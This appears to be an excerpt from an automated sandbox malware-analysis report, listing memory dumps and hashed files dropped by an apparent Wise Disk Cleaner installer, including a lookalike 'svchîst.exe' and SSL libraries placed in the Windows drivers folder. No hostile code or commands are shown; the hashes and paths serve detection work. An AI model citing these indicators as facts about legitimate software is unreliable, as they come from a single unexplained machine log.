SHA256 a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f
SHA512 38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264

memory/1492-152-0x0000000000000000-mapping.dmp

memory/1712-153-0x0000000000000000-mapping.dmp

memory/2988-154-0x0000000000000000-mapping.dmp

memory/116-155-0x0000000000000000-mapping.dmp

memory/4516-156-0x0000000000000000-mapping.dmp

memory/2508-157-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\is-RO3QC.tmp\CSTask.exe

MD5 e6495a498dfa91672a383cb9459c9c5e
SHA1 d1d44a9ec6df8fc42008c13bcf18ca5f790a371e
SHA256 ac5d91aafd9a3f099bb857130bd9d5706172ea8a0f50878e5c86916745df2778
SHA512 7bbdf2006847a3ccbbca9dc02ec8dd32b3f7094470febf2aff213b8ada291835548ec14441d341beaddf5320ae8c25a5c66dd99b8015769615854d5236ecb27a

C:\Users\Admin\AppData\Local\Temp\is-RO3QC.tmp\CSTask.exe

MD5 e6495a498dfa91672a383cb9459c9c5e
SHA1 d1d44a9ec6df8fc42008c13bcf18ca5f790a371e
SHA256 ac5d91aafd9a3f099bb857130bd9d5706172ea8a0f50878e5c86916745df2778
SHA512 7bbdf2006847a3ccbbca9dc02ec8dd32b3f7094470febf2aff213b8ada291835548ec14441d341beaddf5320ae8c25a5c66dd99b8015769615854d5236ecb27a

memory/4636-160-0x0000000000000000-mapping.dmp

memory/4740-161-0x0000000000000000-mapping.dmp

memory/2040-162-0x0000000000000000-mapping.dmp

memory/4464-163-0x0000000000000000-mapping.dmp

memory/1120-164-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

memory/2172-166-0x0000000000000000-mapping.dmp

memory/2752-167-0x0000000000000000-mapping.dmp

memory/2408-168-0x0000000000000000-mapping.dmp

C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe

MD5 e2921d7229412e500624c09645a5d222
SHA1 b1ce462f1a21b726f515150c5aede4b8c592c906
SHA256 ddbe20fca82bad3524f1940fbb5719560a19e61848f802232c4a3f282244b96c
SHA512 09bbf7bd9ae1ca3ae9389ac2a031bb14ef97aa9ae151ad4f3c689bc78fcc6cf511c52bddb870271365745c47c5199191d6803cade998af2c67269c54bea978a8

C:\Program Files (x86)\Wise\Wise Disk Cleaner\WJSLib.dll

MD5 b936056bd95fa2de3197f0267c07f529
SHA1 2cb2a37e5df9a9039995e0248058f0df361d7a90
SHA256 1ec6c0f9ac71693fc04e59855f4231d4348761b4a2eb1171916dee56b604ce89
SHA512 156ead7c66ae263457e4605f7970506f43af79e1ad15fbd0d76f6435f0bd9ec20591bb779132315a4ad422fb3484982ace37e8a4c73d1987a7a5030a4e3745a3

C:\Program Files (x86)\Wise\Wise Disk Cleaner\WJSLib.dll

MD5 b936056bd95fa2de3197f0267c07f529
SHA1 2cb2a37e5df9a9039995e0248058f0df361d7a90
SHA256 1ec6c0f9ac71693fc04e59855f4231d4348761b4a2eb1171916dee56b604ce89
SHA512 156ead7c66ae263457e4605f7970506f43af79e1ad15fbd0d76f6435f0bd9ec20591bb779132315a4ad422fb3484982ace37e8a4c73d1987a7a5030a4e3745a3

memory/2512-170-0x0000000000000000-mapping.dmp

C:\Program Files (x86)\Wise\Wise Disk Cleaner\sqlite3.dll

MD5 dfa08af47fb6bbff6b92308bdce07fe8
SHA1 63078cb67be4bf2dda6cf0de7cfa204ba91441ca
SHA256 7c02eb0f0d7ffe0738649a3aff2c70d3196c9afba81efd56a3b85ca65ee8ffce
SHA512 07848b8cf0eeae17fc67cfb58b2ea009c1726d11256a1c23433dc05a73e703329bfb5d6cc686c8f1f3e2cefc14bc6a946a336d042f982ace23bd398ec1320967

C:\Program Files (x86)\Wise\Wise Disk Cleaner\sqlite3.dll

MD5 dfa08af47fb6bbff6b92308bdce07fe8
SHA1 63078cb67be4bf2dda6cf0de7cfa204ba91441ca
SHA256 7c02eb0f0d7ffe0738649a3aff2c70d3196c9afba81efd56a3b85ca65ee8ffce
SHA512 07848b8cf0eeae17fc67cfb58b2ea009c1726d11256a1c23433dc05a73e703329bfb5d6cc686c8f1f3e2cefc14bc6a946a336d042f982ace23bd398ec1320967

C:\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

C:\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

C:\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

C:\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

memory/3564-179-0x0000000000000000-mapping.dmp

memory/3504-180-0x0000000000000000-mapping.dmp

memory/4416-181-0x0000000000000000-mapping.dmp

memory/3052-182-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

C:\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

C:\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

memory/3720-186-0x0000000000000000-mapping.dmp

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\French.ini

MD5 3ec80eda36af3cae27ad0bc179efe392
SHA1 42924e65a3b9bef333b9f546343cf30d6fe25d71
SHA256 0c05485c08fc6877eae77afa6d38623360c16aadf9b6ad0271079854b6d8b83e
SHA512 6f5a1c499adb8d8fd20b29293a8b91e942de6945df1df0185d7e2e71ed48ea917f38b785f206f0d6065b6ae4a5b85f38e8275315e86679d4def32f35d1351cb4

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\German.ini

MD5 12aa09156da6482c24a1b2d4b55d855c
SHA1 1c2dad1b7d7beeb65710da2efafe36688754000e
SHA256 2fd313688b2ad99a3a4be590b5b96f4932cdecf5211771b84f2d060b00a3893e
SHA512 0742e6ab784dc765dcd13f0551883bad341b254cb993a8a6016ffbd18846109bbb6f00611dfde797db8382e014805c6e2a8ac38c50c827054af9ac7447e511dd

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Welsh.ini

MD5 f1aa230d4e1dc0ad8ce48dbbf0f93353
SHA1 45c5ef63cf2110a2a11461185d30b9c5a081fc22
SHA256 265348499e6625affb99259e7d1770f0155a5e3b7bf62f4b61f3aa01832d8f9c
SHA512 263251223abca66cdeec425651c706d49e7bcc48769344104ef9cd5122ff9bdc125153b25207fc0af744b20d61086894cc8b10ee3defba9493e5da2709717202

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Ukrainian.ini

MD5 a3384eb4a6122fb763038c26359acf05
SHA1 a0d587ccf4f19022e6e4b4df3106e87a1ded94c7
SHA256 3d20e0e5cfd6375253d4286ec5fd33fdf7aeb0d8bf26cb714d8b91e3b3c10868
SHA512 6b2d99fb897f6e7fa017b312127f29d37bfd046b343c1a6849a4e7cb408e9f7709d3b5d2000fab430f6189e70cd6afffef324b1187f8b25fe2e9ce3ca2b04a27

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Turkish.ini

MD5 f34b68131e35f62513feb8278cca1ae1
SHA1 bd4ac075b01cd358431e2d9ad6fb2fe2de8b5aff
SHA256 49b0ecac0b88c345cd6b5f3f501f25e3720077faf6710c5f2b6fd984e4d4d7f9
SHA512 c6cdbeb4771f3cc2de6116c0fde80348d34ade78506d54c61eca596d3131bd809452155fc4868b18f15b3968ee0ae4f01e7cbefecafd58d499e263543bdc1dbf

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Thai.ini

MD5 85f062f1a900a1da8a32f46803cb62fb
SHA1 5baa775d7d287060937f8b86c69be1850a1f9ab4
SHA256 3e8e09cf740bef1dabdcb6a7c69185bf0fac3f13b727c2c1de79fbde7308470a
SHA512 7b40bff744244e48edafdb999aed616519b7665187a25d522c88532a0e5e8eacc9091fbb198c93fbe39a860e10c35ee39a689e8f31dab2cca578cf12057fef50

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Swedish.ini

MD5 8f053575db50cfaf4418fb2e5263b2ae
SHA1 cb95844f69291b2656726f156e51b8611a55d4fb
SHA256 98677a07f37daa333e507fc576aba8ebb4489a5822104f7c4bee53db2f8e4202
SHA512 e7e3fcddd6f1b21aa48901f0e8d9633705b69d8f34ce08c2e7fd81128c7dd811bf2755e4f517325a10480a427a7eebe19307deb96edff9ecc8077094ea740061

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Spanish (Spain).ini

MD5 fef1352852ad6da36123893c3c183834
SHA1 5599ea541a373e9e63b692db17126eb42f1739bf
SHA256 d295342e3fff2bb44fe3010669400ddbc82e103f87beb5ead1c6b3cab3ade0b6
SHA512 7dda1508cd623dc753ef137ac58e759bab22f422f20d3802c49876bdd003015468ef5674c4186ae04fb745ae56d9ae21d57438baffad9597f0be53ee2e9f8d3a

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Spanish (Colombia).ini

MD5 ae51cebbeb929ca8ef00abdee0554352
SHA1 e245b0ece229b9d1a2109fb48e1533f0f7dcc490
SHA256 9cb9b5580e4706168c02b07f3ef6656ebd2f6d9661cccd75b089a465d5ac0565
SHA512 c617871237592bfe3bcd1ac4e3b41ef4157b0b6cbcb636fe0d56f8ea59c198fc4551b6b86f1497778f3c4db06fb8e89169e5ac0e9662532d4c6f0f0b944a3ea1

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Slovenian.ini

MD5 204fe6fcde25232628a4d7b34e6b87fd
SHA1 613efc64843467bd90ec64949367f2139f4b581e
SHA256 4940b086c467d2ee6fd232f787bf03382c8328f2ce71c7ca747c02a7a368c1de
SHA512 88af2f2bff0fb8daa60c048cef6008bafdb636970b30da4765cf6ee2f62604e1581a3ce822555a14d018a7f10d0d2da2e072d58b12be4f27200dcdf20890b726

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Slovak.ini

MD5 5108c5d28c126216a792f4a0900847fa
SHA1 9a8b3e565e37e1bf717d3e1c7ebca12e414328f5
SHA256 3860ad448ebd501be377fbd46c65cb4e7aecc809900d5f085ee5223931425695
SHA512 ce241b74f7903131fd0af070cc75a29d01e375e5d05636814fa123c1edfdb0304863f997fb3fcb3467bf87b770f8412acf67a29480b96877e8d4fd0888b39438

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Serbian.ini

MD5 d5de1a134aab351dcd5b8f22f32ec30a
SHA1 45404143905dcb284e99acd78285a3ba86a1c1a6
SHA256 2a2338c828fd426a6d50e4866ed1c59ccd292b877cf66374c57a8826b30c9aa1
SHA512 7727f4c9902daae600e48a950afd61ba2e26d8a943f20bbfc2ec7eaf01f1de2a8b9d04e4fd4ec9b38cf700c6df00d58c714f1208e60383755ad5220715912427

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Russian.ini

MD5 479bfcd4c6e0a91bce8eeb3d5282902a
SHA1 a73b34daca2a27e159a7f14148423bd0e8877287
SHA256 b326491b5a4245e9b3a436cfe1b023d88b35cdbbb50368bbac5f7d1f19560718
SHA512 8c799a763cae7bdd33ff8d9a3295b2b92f87413bdb46e590c02255aedbd32707faf5d5badfc884cddeeb8be4772c2f824d16af3996e5ecb0692a2399594121f0

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Romanian.ini

MD5 e56f223aea3e1d394c31b93f17054cb7
SHA1 9fe9ca1dc70cd7e0b2264842139a364ac4a8e689
SHA256 865b6284291dba5b148d236f0ebfd3aebf0998dabfe36cc3a013658af1733dcc
SHA512 21050172c652bbcc93ab409d16aaef330a713d8dcf33b5f84ea323832b3489bddcb98ec552d00e48afd894e1f935a0fdc22749ee018f8d46d407559a0137eeed

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Portuguese(Portugal).ini

MD5 66ccf14a92b6354bed01867615a76d90
SHA1 7f133285713146b2e343d44c0de190fac75e40f6
SHA256 a3af006e4957a14abd637e50cf265ecba049ca53ff716ec0298c96a0265a2f9e
SHA512 c43f521781d59a150a124d6105d295dbfb5ac6dee0401b9c927eeda8ba0a8df21d1e69fdf8dc090314f3945b97dc72a9cd3ba9aed34bbb8f9ae96fdcb96ca784

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Portuguese(Brasil).ini

MD5 3445d1277329541b11ddb2b1b5dc54f5
SHA1 57fac60be3e79eb01d4170df6abbb44dc62c21e6
SHA256 c34cf5c5773429d9c1273bdeebaf59fc0f7984db541f6524d2c1718c191aeed2
SHA512 2b0080337609bd458677532371a9226b9112edc9a1c8a6567423fd324559338c934ae409a012a903ca6f464281c327a812aefe932395d9e739ef8f0e379ebf28

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Polish.ini

MD5 1a59560e88582dac1e5b7a70a38463a5
SHA1 fe80e956dbf54bd066f2f11d697072377dd3df6b
SHA256 b826a3a9198323ce5b29ba96a311a632b98c05fbf4d02213abd30ce0ea262427
SHA512 0d00273db68c3ebb58f0be6102b1f23d2096197aacaa8577aa42473aa1b587f50c86f333c1831b78879b2ba5ab1793488af1f875ed111eb800a1b2c9becdf69e

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Persian.ini

MD5 71f1fe9e66926028a09b7a5ff36ec42a
SHA1 521a99b288ae887391c36fb86555e25df5685164
SHA256 8044110a96bbe6dcc5cc74fa8106a2ed250536ea8785b0eb1148a696c74c5353
SHA512 62c8b5c0eda2163d7093da06a176270558f377d0e7fc8fd2aea137045c5fdc4cf62be47fc2c215e2bf4d68ba8eb343ceb70bce1b991502ecd1407350dab086c5

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Norwegian (Nynorsk).ini

MD5 d82a2f11ab17c1fdc94e8aca732bfdc6
SHA1 58347d500fa9efaf46b600345f9752f426e99b45
SHA256 6e9385096f433f4a4d95997d0483ab08695b6b7cf2c9f1f525cf41b83c85459c
SHA512 61f6ddad161a8e0df43b60e424fbd83e0d759f1bedfcfd5268c803f98d98ba4006b1c2f9f2b63b3a3461401fdbf16dec2cd07d8fac15af7eb61fd5b79a564343

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Norwegian (Bokmal).ini

MD5 5d95e5077b31764d3d91ace0ea64490f
SHA1 12bcc6fd0e6fa8c7109cc4cf19033a0c3cd8fadd
SHA256 73721487c7680b844e73079cc57acc6988622506230f73929c63ef197d19c83e
SHA512 f22e764a002e835a51fc4db17320c96241e949f6b437c1f699714e41ca759f096a99c61cc82b773198f962170322cadbd4a5f943550ad7b4355d48cf05915bcc

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Nepali.ini

MD5 8e9d6867bb1b047e0e7eecf8a7ab4151
SHA1 269c9258fed0552758c75897ed8346e7e8c4eb2b
SHA256 44c210cf753a79acba19b171fe4643056dee29d441ccf91fa6121b7e441cd2ea
SHA512 817e7016dd68f6402029c1f8fa49ac2edd8d114f06ac5a8c1b68b39e77279d6e68ec49a575da950e1c9d686488195bebb95d0997bf3123bfe54dfffcea689183

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Korean.ini

MD5 8f674280944a449f943689e19ad0ced2
SHA1 90c7d3972bb418eecb2696e2e7390df2c0a33a7d
SHA256 a2223c96dc9fced161469aa2989db97ba0e9393dc86cbdc7aa06d4342772a000
SHA512 6b788b826af729a2217d6b5d72bdaf4ab9682e6cd71331d1c5da4384fc25a4b4d9f2b44d776b65a8ade2d589ce55baa7e00f11a9d53a36fa79ce5943f843df65

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Japanese.ini

MD5 7792786223200e5da40d9c542a7f4b8b
SHA1 b71f45389d66dfb56303a81547aafcd3bfbe869a
SHA256 a62a2aaf6e39e46a9cb0053a670d09dcb4aaf9142f89a7b12daad1793154db9a
SHA512 2a3d66677eeeea065392d27546bc2fba5e115f906cd1dc4398dd848f104a9d5cf98d2dfec8daa432ad94ee6f93bd45d5f300c0c6801bbfadb073639b3f5f32e7

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Italian.ini

MD5 4b9f92249266356fea5844eccdc6e6f1
SHA1 0a060c8d39e98fbda3411b8b915a83754af54089
SHA256 1a2f241b503be86067d89a8fcb69bdffcccec96912a765337dfadcce6bca75b0
SHA512 8ab4323d596a71d1cbc9492b48eb6f6996ddd0411edd6732417b68dd27d1acb2f00c17865ce7a17dac58947dd7482771c11c8fc5c2b73561a47469641fe9a82a

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Indonesian.ini

MD5 0a763d65adccbe593039ccdcfde7b499
SHA1 833c56164a17b152d4098ee95fd4bb6912193a89
SHA256 759b0029fc140d49cb40bcd197fc64537fe408cd78641d0cecafac599aa97d10
SHA512 b83d88ce225621e0460d40c8c9ad92e91ffe1c0b3875270ff8ed8aa66a7b3a08c6605e6f4e7b7bf5d02b9ea2ab7256dff07f2bf31232d2675de869d06bfc9d7e

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Hungarian.ini

MD5 b967b7a48eca3f5076033759089e4142
SHA1 9e29f54c07066608be1cb6abc59cf7cda823cc03
SHA256 1ecce57dbf90759fcfefbea163521dfb8d3281a98c216d94ec51771308cf32dd
SHA512 4a588f3150e21d1b7923fc885ab28f36a40488157f583de9558476d04a2ceb5fa3d0f91ba09d12aacee1a0a8d5797c4be6e15ba01e6a01427e1de88845bd04cb

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Hebrew.ini

MD5 75009c9455e68643ac2e2301b8af20e2
SHA1 3091a33bb6517115b38f4eb3cad3747f3b64569c
SHA256 05746a60b31c255eaf1ea903c5ad47f3e25d98633472cee165acbec3521c64a8
SHA512 18619921ab3bcf481466960f1cab10b2185be93470ee9b6cd01377b523ea8810e6d159a4515a0cfa575df3617f47fc5cee7d5982cc2deff0fa8a69644e7a0eb8

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Greek.ini

MD5 6e449bd01c21478ec0c19bd25a8c3ee5
SHA1 2aeba60b7600ca9e71a5fdd04c06ba05f1010262
SHA256 5c891ead72b187252daf3de22075a9c0e7f967e3050aec97db6f019d59bec138
SHA512 b691de0ac4254a29a6dd87fdfa5973c4b8c11719304ed665d6db661df66d7a1693e15514477979e24eabcd48fe9287fe07a123da6a469ef5dad07cf43d531021

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Finnish.ini

MD5 dc73d7da4015500c369caacb8ef26e21
SHA1 c33246680111d1fc3fb3cdac10dd7c37f9f05a33
SHA256 d70edac364dd4273a80e40e5d3a710198576b1cfd81e3cec0bfb4d4683dd50fb
SHA512 0f4f0a50f3dd36999864669f078d686b5af04cfb750951c9abe2cdbb609c683e447fd56ac28a34d4a83e53444c12d13cc742bcc9bd3236ba6e363dfbcecbf3f8

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\English.ini

MD5 dfb897952f03b002a95ef8f47a98afe5
SHA1 cd9801955ea04a949175cbb8a3972488ef15e966
SHA256 86da3520698f44289c789b1d4771929edc36f5dd36c6ba54e1382a06a39c7684
SHA512 8536477f154d0687e0c6673b553a27c1f2ef2b38231162e31ab4039db0d772d5d652518f15ddddbf74f981345307eef175321ae262514b06506b18823e0dc5ba

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Dutch (Nederlands).ini

MD5 8e2dedf7ad4959dcba5aad9221755ac1
SHA1 1e47e115dc2fb5cc2e27d1ab2726b85409c8338b
SHA256 32f54c23c8760205d74885992cd8e11fd23911b44660078e1ee11e01af3f4106
SHA512 b932acbbd885fe68dc6ab31386bf3a9d6523ef7e3063c922cf77ac90ec147f7df1c087bcd067f8677abfb3b134f161035f7116c25ba544d93461e372f8e93a37

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Danish.ini

MD5 3ca37cef05d366f1e10a49a6dde3225a
SHA1 2734b737b07ffdcdf7bd410b29e3030c94482dfe
SHA256 0714b1684aa7d1cab8978138754bcf712b43162e45e48c74aab1d588907d2a46
SHA512 e7d1aad57bb919f192427afe3558dc1c4467d82378b742a82da40ef430db5b8aa41aaec562bbc71ef36731d0800b113e1e38e861f9967904e07f6d4a64a01974

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Czech.ini

MD5 a1800a0b75aaf75089172dce6d9cbcba
SHA1 6eb1245d876ebfd253c77df807acfae0b6c72eed
SHA256 10d4accda03a1fb836d02eaab186054b49acb1630edd0a07c8d2653234266b1d
SHA512 6262cd53a2993d985e2c440a45a872a43cc9de8df380bbbf861df3748243c3768f85adf4db6e18ba148cd2d0ae3c6eb7d77f822c8015364d94114141d605a917

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Chinese(Traditional).ini

MD5 3b2fe60c4ace1c7733549c1e892622fa
SHA1 5903fa94e31186df51bf520add0542153c963a71
SHA256 c983c82379b6dc354f7dc4fb37e5ee147069c1141503df4a1efa22884969a69f
SHA512 ebf3e1ef1354916d9cd3f4ba7f9c2a175e6b9d162e4380a69f551926c132079494b67ff3defaace968659dde396cb3e0a191c4bdea9ac6dde7349c563c1756ab

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Chinese(Simplified).ini

MD5 ddb1e3858ba84d18e832bf926f71b8d3
SHA1 ff7af2ab8f8a9b21895e260055df79b10b1e3da2
SHA256 ac03ab706d80d0175939940091df58543eb885a5cc939e7dfa72a12dfe0a680e
SHA512 b4b8da9b1b3b363e4e614a1ba52b926d785056011f2927febad29680df22225ded628141bff4b3bb9e9d11a77b88db5b44ef8955142ecb599f2891a09077fb23

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Catalan(Spain).ini

MD5 e06f62dcb6360c54d0c99e58f7108a1b
SHA1 60d47951f1cb0fff9abcccfdbd297337e5435130
SHA256 7efcb6193c689aab517532b3a7dde3fbce7e42c6060fb698844458aaeae6656b
SHA512 fa6d8726032afa24926e374d8496d73a61776cda53d735a980a87b1aaf2db160ec7a8243bf9e6c034d18218a2f1222d256f820c059c77647648456432682078e

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Bulgarian.ini

MD5 8db61046f722c6feddf6e9ff36395cb1
SHA1 32a99cfa048b1bdfa2a27d8618ebcbea98ef31ac
SHA256 65fedfe3cf7024a0345345e7973f67f0c6b8b0f548dcdca5c4f48c0b667d22e8
SHA512 a34408d86ad01faf8d7a5b651210943b4e8d5d3c4226eb4c082e5c7c346611015fa9139c3774d365df70d0d146a4a7c49fb1ff8ee04d668c3129d8c49a3bd207

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Belarusian(Latin).ini

MD5 09acc2789101dbef07ab7e1c6be7ace6
SHA1 7a55791699490fc7b23fb51fd1b5f0f322a05447
SHA256 2007a5a9dbac09656e761b04448e53dd094ec30355f6394204158648d89131d4
SHA512 ad5071fb49485dc2a8a7d1ab2f7471b90d403b733bce3bf5cffdf017915cf89c719a0d63b6c22d7fe934dcb3713c8748e1f9fcaf6891feeb53ddc2d7c51998e5

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Belarusian(Cyrillic).ini

MD5 538d04c6d3802d211d59fe34d24b08b2
SHA1 dd24233a739f0dc681b31d215006b407d4b10395
SHA256 fd915abe1e9c0deb8e103624eb5f0c4f29ad9506092214da36e4e9ea85add212
SHA512 6f759975e4f4c95145ab862190428dbf7cf8ab8e5e32379cc44cb9c1f63c7c87e8263033dced3f55d2ef7e61212f22d3892907f823f1e9029dbc7a776de70e31

C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Arabic.ini

MD5 3e543da6bcc0ee84d53d88438fafc799
SHA1 c86b179b803d37852e73a6145c135431b4d52d74
SHA256 586419de24beb7faee4a142ee0b5b78c35ff9b7ae4e4a7cc50fb1e2bf082f98c
SHA512 3a3cedfdbc40e9a2458f1117d08e034881c4ff8ed090bdb2f40f095ee53ec7a4d23dc83fd3ce1fea5939fe43cf31419fcbff799a88ef078e60dae9b6035d0640

memory/1932-187-0x0000000000000000-mapping.dmp

memory/544-229-0x0000000000000000-mapping.dmp

memory/1196-230-0x0000000000000000-mapping.dmp

memory/540-231-0x0000000000000000-mapping.dmp

memory/4584-232-0x0000000000000000-mapping.dmp